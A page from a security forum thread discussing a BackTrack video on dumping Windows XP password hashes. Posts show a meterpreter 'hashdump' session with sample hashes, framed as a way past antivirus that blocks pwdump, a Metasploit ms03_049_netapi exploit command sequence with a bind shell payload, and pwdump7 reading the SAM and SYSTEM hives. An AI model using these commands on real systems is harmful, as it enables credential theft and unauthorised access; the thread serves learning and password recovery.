Page 3 of 5 FirstFirst 12345 LastLast

Thread: Dumping xp passwords - bt3 video

Just burned his ISO

Exclamation Possible for vista home basic OEM To crack my password with bt3

How can i crack the windows password for home basic there is only one user on the system and i can boot on back track 2 so which files do i need form c windows or whateva folder in back track 2 to get the password as i have forgotten my password i need to open my account i have lots of stuff in there and can not fromat it emergency help please !!!!!!

Quote Originally Posted by hackproof View Post
    How can i crack the windows password for home basic there is only one user on the system and i can boot on back track 2 so which files do i need form c windows or whateva folder in back track 2 to get the password as i have forgotten my password i need to open my account i have lots of stuff in there and can not fromat it emergency help please !!!!!!
    You will find it much easier to use ophcrack in this type of instance http://ophcrack.sourceforge.net/

Another method is to use Metasploit-Fu to do it, in the case the clients target has a HIDS or an AV that detects and blocks Pwdumd just run this in meterpreter

Code:
    meterpreter > use priv
    Loading extension priv...success.
    meterpreter > hashdump
    Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
    Guest?ź:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cdbe57593e4d63e626e7ed14cc617a53:::
    SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:fb41e16b63b7afe84ca7711e6c719097:::
    SRV01$:1003:aad3b435b51404eeaad3b435b51404ee:39850085d75ecaf3c17a02c55321f3bb:::
    a way to make i more difficult for an attacker to brute force the hash would be to disable Lanman hashes
    support.microsoft.com/kb/299656

nice video looking fordward to seeing the next one.

Developer

See I did not know that. Thank you. I'm plan to know all the meterpreter commands by the end of this weekend So on Monday when classes start I will be a meterpreter ninja --Look out

Junior Member imported_spudgunman's Avatar

pureh@te other then with the new site i must work to archive a copy of your videos, i gotta say you keep churning out new good stuff, i think you finally have the recording down and i was excited to see you have more MS-Framework videos up, Its nice to watch some random commands be thrown around to get the commands to memory good work, when you have a stack of this stuff up might I suggest an idea that you burn them all out to a DVD and sell the profits to Remote-exploit team? I would pay just to have the library of your videos to use as a professional tool to demonstrate in presentations to get the "Scare factor"

Quote Originally Posted by hackproof View Post
    i like balding_parrot reply because your question is dumb as hell, and you should pay the damn fine people at objectif security first off if you can boot something else just pull out the data that is so important, you don't need the password to take data from a unencrypted hard disk. a tool that will just clear the password for you is here...
    http://home.eunet.no/~pnordahl/ntpasswd/

or just mount the disk with BT3 windowsPE or plop it in a working computer and pull your crap off.

my wizard can beat your dragon 31337

Wow, awesome work man.
    There's no fate but what we make for ourselves.

-I already know I cant spel-

great vid! I like the fact that I can follow your videos and it doesn't go lightspeed through the typing like some videos I've seen.
    Hope to see more from you.

Just burned his ISO

Very nice tutorial!!

Anyone mind giving a brief overview of how this exploit works? Is the attack exploiting a buffer over run? What pc's are vunerable to this attack? SP1?

Thanks again. I'm always interested in the "what" along with the "how".

Just burned his ISO

great video, thx a lot!

hello people, i have some problems to find a vulnerable computer.
    My first question is: how do you know when autoscanning the network that the computer is vulnerablable for the exploit in this video?

I tried with my computer but this is the error i get in msfconsole:[*] Building the stub data...[*] Calling the vulnerable function...[*] Exploit completed, but no session was created.

these are the commands i used in msfconsole:
    use windows/smb/ms03_049_netapi
    set rhost 192.168.0.2
    set payload windows/meterpreter/bind_tcp
    exploit

oh i forgot to add:
    i guess that i get the error because my computer is not vulnerable?
    And of course: thx for helping me, im a noob

Phillyblonds

Default have a problem

i did what the video said , i tried it on my network
    but got this error message

i got the remote system Harddrive C:/ added to my network as Z:

i upploaded the 2 files pwdump and the dll in Z:

and ran

Z:\>pwdump7 > xppasslist.txt
    Pwdump v7.1 - raw password extractor
    Author: Andres Tarasco Acuna
    url: ( no url here)

UNABLE TO OPEN DEVICE?
    Error reading system registry file C:\Windows\SYSTEM32\CONFIG\SYSTEM
    Error while setting pointer on device: 6

Error opening sam hive or not valid file("C:\Windows\SYSTEM32\CONFIG\SAM")

what went wrong?

Page 3 of 5 FirstFirst 12345 LastLast